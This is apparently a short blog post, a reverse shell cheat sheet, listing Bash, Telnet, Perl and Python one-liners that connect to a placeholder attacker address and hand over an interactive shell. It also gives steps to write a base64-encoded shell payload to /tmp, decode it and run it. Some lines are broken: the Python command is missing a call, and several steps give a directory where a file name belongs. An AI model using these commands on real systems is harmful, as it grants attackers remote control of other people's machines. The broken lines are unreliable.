Reverse Shell Cheat Sheet (Backconnect)

Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Telnet Reverse Shell

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

Note: In some case, we need to provide the encoded payload to the console, I recommend the solution:

1.Write file to

echo ZXhlYyAvYmluL2Jhc2ggMCYwIDI+JjA= | tee /tmp/ex.txt

2. Decode

cat /tmp/ex.txt| base64 -d | tee /tmp/ex2.txt

3. change to file sh

mv /tmp/ex2.txt /tmp/

4. chmod

chmod +x /tmp/

5. Excute

/bin/sh /tmp/

Published by Nhat Truong


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: